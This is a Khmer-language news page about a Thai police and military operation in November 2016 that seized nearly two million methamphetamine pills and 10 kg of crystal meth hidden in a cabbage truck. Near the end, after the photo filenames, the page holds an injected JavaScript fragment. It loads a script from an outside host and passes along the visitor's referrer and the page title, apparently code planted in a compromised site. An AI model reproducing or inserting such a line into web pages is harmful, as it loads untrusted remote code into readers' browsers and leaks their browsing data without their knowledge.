Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ថ្នាំញៀនជិត២លានគ្រាប់ ដែលបង្កប់ក្នុងស្ពៃក្តោបត្រូវក្រុមតម្រួតថៃចុះបង្ក្រាបឃាត់បាន

ប្រទេសថៃ៖ ជនសង្ស័យម្នាក់ត្រូវបានក្រុមតម្រួតថៃសហការជាមួយនឹងកំលាំងយោធាភូមិភាគ៣ ធ្វើការឃាត់ខ្លួន គ្រាដែលរូបគេកំពុងដឹកជញ្ជូនគ្រឿងញៀនជិត២ លានគ្រាប់ ដោយដាក់បង្កប់នៅក្នុងគំនរស្ពៃក្តោបលើរថយន្ត។

 

ប្រតិបត្តិការនេះបានធ្វើឡើងកាលពីវេលាម៉ោង៤ល្ងាចថ្ងៃ ទី១៥ ខែវិច្ឆិកា ឆ្នាំ២០១៦ បង្ក្រាបនៅចំណុចក្នុងទីតាំងស្ថានីយ៍ប្រេងឥន្ធនៈមួយកន្លែង តាមបណ្តោយផ្លូវអេសៀ ស្ថិតក្នុងស្រុកឥន្ទបុរី ខេត្តសុីងបុរី ប្រទេសថៃ។

 

រថយន្តដែលប្រព្រឹត្តបទល្មើសនោះម៉ាក តូយូតា ប្រភេទ ដឹកទំនិញ ពាក់ស្លាកលេខ១៦០៩នៅលើរថយន្តមានដឹកស្ពៃក្តោបពេញ ដែលអ្នកបើកបរមានឈ្មោះចាវ សែនយ៉ាង ភេទប្រុស អាយុ៥៣ឆ្នាំ ជនជាតិថៃ  និងមានមុខរបរជាអ្នករកសុីបើករថយន្តដឹកបន្លែបោះអោយម៉ូយ នៅតាមបណ្តខេត្តឆ្ងាយៗ រស់នៅភូមិ៩ ឃុំសាន់ថាក់  ស្រុកណាណយ  ខេត្តណាន។

 

ក្នុងការឃាត់ខ្លួនកំលាំងតម្រួតថៃបានធ្វើការឆែកឆេរនៅក្នុងទ្រុងរថយន្តដែលពោរពេញដោយស្ពៃក្តោប បានប្រទះឃើញគ្រឿង ញៀនប្រភេទយ៉ាម៉ាចំនួន៨៧៨ដុំ ស្មើនឹងគ្រឿងញៀនចំនួន១៨០មឺុនគ្រាប់ និងគ្រឿងញៀនប្រភេទ ម៉ាទឹកកកចំនួន១០កញ្ចប់ ស្មើនឹងទម្ងន់១០គីឡូក្រាមផងដែរ ។

 

ក្រោយការសាកសួរជនសង្ស័យបានសារភាពថា  ថ្នាំញៀនទាំងអស់នេះ គឺគេបាននាំមកពីភាគខាងជើងប្រទេសថៃ  ដោយដឹក យកទៅបោះអោយម៉ូយសម្រាប់ ចែកចាយនៅក្នុងខេត្តប៉ាធុមថានី ។

 

បច្ចុប្បន្នជនសង្ស័យរួមទាំងវត្ថុតាងដ៏ច្រើនសន្ធឹកសន្ធាប់នេះត្រូវបានកំលាំងរៀបចំបញ្ជូនទៅកាន់តុលាការ ដើម្បីចាត់វិធានការតាមនីតិវិធី៕

img-20161117-wa0068img-20161117-wa0072 img-20161117-wa0069 img-20161117-wa0067 img-20161117-wa0066

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More